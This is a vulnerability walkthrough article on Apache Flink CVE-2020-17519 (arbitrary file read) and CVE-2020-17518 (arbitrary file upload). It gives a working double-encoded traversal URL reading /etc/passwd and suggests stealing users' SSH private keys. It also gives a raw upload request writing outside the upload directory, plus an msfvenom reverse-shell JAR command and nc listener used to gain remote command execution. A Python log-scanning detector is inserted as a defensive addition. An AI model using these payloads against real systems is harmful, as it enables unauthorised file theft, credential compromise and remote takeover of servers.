2025-03-26 Update From: SLTechnology News&Howtos shulou
Shulou(Shulou.com)05/31 Report--
This article analyzes the Apache Flink arbitrary file read vulnerability, CVE-2020-17519.
1. Arbitrary file read (CVE-2020-17519)
Visit http://your-ip:8081 to enter the Apache Flink control panel:
Use the PoC in the address bar:
http://x.x.x.x:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
This reads the /etc/passwd file:
In testing, reading the /etc/shadow file was not feasible: there is a permission problem, and the request returns an error directly:
However, you can try to use the arbitrary file read to read the SSH private key in a user's .ssh folder under the /home directory for SSH login, and then extract. (The author has not tried this; you can explore along this line of thought.)
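For detection, the double-encoded `..%252f` sequences in the PoC URL are what to look for in request logs: a filter that decodes only once sees `..%2f` and no slash. The following is an added example, not code from the original article or from Apache Flink; it assumes a reverse proxy in front of port 8081 writes common-format access logs, and the function names, the decode-round limit and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

LOG_PREFIX = "/jobmanager/logs/"  # endpoint used by the PoC URL above
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IPs), in the common access-log
# format of a reverse proxy assumed to sit in front of port 8081.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Jan/2021:10:00:01 +0000] "GET /jobmanager/logs/flink-standalonesession-0.log HTTP/1.1" 200 5120
203.0.113.9 - - [05/Jan/2021:10:00:07 +0000] "GET /jobmanager/logs/..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1432
203.0.113.9 - - [05/Jan/2021:10:00:09 +0000] "GET /jobmanager/logs/..%2f..%2fetc%2fshadow HTTP/1.1" 500 210
203.0.113.5 - - [05/Jan/2021:10:00:12 +0000] "GET /jobs/overview HTTP/1.1" 200 88
"""

def fully_decode(value, max_rounds=5):
    """Percent-decode until stable; return (decoded_value, rounds)."""
    # One round turns %252f into %2f, which still hides the slash;
    # the second round reveals it. max_rounds is an assumed safety cap.
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def is_traversal(request_path):
    """True if a /jobmanager/logs/ request names more than a bare file name."""
    path = request_path.split("?", 1)[0]
    if not path.startswith(LOG_PREFIX):
        return False
    name, _ = fully_decode(path[len(LOG_PREFIX):])
    name = name.replace("\\", "/")
    return "/" in name or name == ".."

def suspicious_requests(log_text):
    """Return the request paths in log_text that is_traversal() flags."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match and is_traversal(match.group("path")):
            hits.append(match.group("path"))
    return hits

if __name__ == "__main__":
    for path in suspicious_requests(SAMPLE_LOG):
        print("traversal attempt:", path)
```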
2. Arbitrary file upload (CVE-2020-17518)
An arbitrary file upload exists in the Submit New Job page of the Apache Flink dashboard:
Use the PoC:
POST /jars/upload HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187

------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../tmp/success"

success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--
Enter the test environment to confirm that the success file has been uploaded:
In addition, we can upload a malicious JAR and listen for the reverse shell to execute remote commands.
First, we use MSF on Kali to generate the malicious JAR:
msfvenom -p java/shell_reverse_tcp lhost=192.168.153.6 lport=5555 -f jar > /home/kali/Desktop/shell.jar
Here lhost is the IP of the local machine and lport is the port for the reverse connection.
You can see that the malicious JAR (shell.jar) has been generated successfully.
Then open a new command-line window on the local machine and use nc to listen on the port: nc -lvvp 5555
Finally, upload the generated JAR through the Submit New Job module:
Click Submit, and the listener receives the reverse connection from the JAR:
Execute remote commands:
Here we can see that Flink was not started as the root user, which confirms that the error reported when reading the shadow file earlier was a permission problem.